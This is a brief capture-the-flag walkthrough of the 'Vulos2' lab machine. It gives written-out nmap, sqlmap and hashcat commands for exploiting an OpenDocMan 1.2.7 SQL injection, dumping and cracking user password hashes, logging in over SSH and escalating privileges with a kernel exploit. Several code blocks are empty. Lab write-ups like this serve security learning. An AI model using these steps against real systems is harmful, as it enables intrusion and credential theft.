Vulos2
Tools:
- netdiscover
- Nmap
- Wfuzz
- Nikto
- sqlmap
- hash-identifier
Vulnerability:
Use netdiscover to detect target IP address
netdiscover -i eth0 -r 192.168.56.0/24
192.168.56.104 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.79.104 -p-
port 22, 80 and 6667 are opening.
use wfuzz to scan. Nothing interesting.
use Niko to scan. Same.
Check the webpage, looks like a link may be useful.
Double click it.
Exam the links. In Document, I found this:
Looks like path /jabcd0cs/ is available.
go to http://192.168.56.104/jabcd0cs/, I found the app is OpenDocMan v1.2.7.
searchsploit opendocman
got the exploit. Try the sql injection vulnerability:
1
| |
Now I know the database type is MySQL.
Next try to dump all table names
1
| |
looks like odm_user is the table I want to take a look at.
now dump columns from table odm_user
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -T odm_user --columns --dbms=mysql
looks like username and password
now time to dump all content from username and password,
sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -C username,password --dump --dbms=mysql
use hash-identifier to detect hash type
looks like they are MD5.
use hashcat to crack it
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
only guest’s password is cracked.
Find a very good website to crack MD5 online http://md5cracker.org/, get the cracked password webmin1980 for user webmin, and login:
not very helpful.
Try to ssh to the box using webmin
get the bash:
python -c 'import pty; pty.spawn("/bin/bash")'
first check the os version
uname -a
searchsploit 3.13.0
try this exploit
in Kali:
1 2 | |
in target:
1 2 3 | |
DONE